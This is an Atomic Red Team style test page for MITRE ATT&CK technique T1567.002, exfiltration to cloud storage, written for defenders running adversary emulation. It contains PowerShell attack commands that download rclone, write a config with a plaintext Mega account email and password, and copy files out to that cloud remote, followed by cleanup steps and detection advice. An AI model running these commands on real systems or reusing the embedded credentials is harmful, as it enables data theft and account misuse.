# T1567.002 - Exfiltration to Cloud Storage
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. 

## Atomic Tests

### Atomic Test #1 - Exfiltrate data with rclone to cloud Storage - Mega (Windows)
This test uses rclone to exfiltrate data to a remote cloud storage instance. (Mega)
See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: rclone must exist at (#{rclone_path})

##### Check Prereq Commands:
```powershell
if (Test-Path $env:temp\T1567.002\rclone-v*\) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile $env:temp\rclone.zip
Expand-archive -path $env:temp\rclone.zip -destinationpath $env:temp\T1567.002\ -force

```

In [ ]:
Invoke-AtomicTest T1567.002 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
New-Item $env:appdata\rclone -ItemType directory
New-Item $env:appdata\rclone\rclone.conf
cd $env:temp\T1567.002\rclone-v*\
.\rclone.exe config create T1567002 mega
set-Content $env:appdata\rclone\rclone.conf "[T1567002] `n type = mega `n user = atomictesting@outlook.com `n pass = vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA"
.\rclone.exe copy --max-size 1700k $env:temp\T1567.002 T1567002:test -v
```

In [ ]:
Invoke-AtomicTest T1567.002 -TestNumbers 1

#### Cleanup: 
```powershell
cd $env:temp\T1567.002\rclone-v*\
.\rclone.exe purge T1567002:test
.\rclone.exe config delete T1567002:
Remove-Item $env:appdata\rclone -recurse -force -erroraction silentlycontinue
cd c:\
Remove-Item $env:temp\rclone.zip
Remove-Item $env:temp\T1567.002 -recurse -force
```

In [ ]:
Invoke-AtomicTest T1567.002 -TestNumbers 1 -Cleanup

## Detection
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.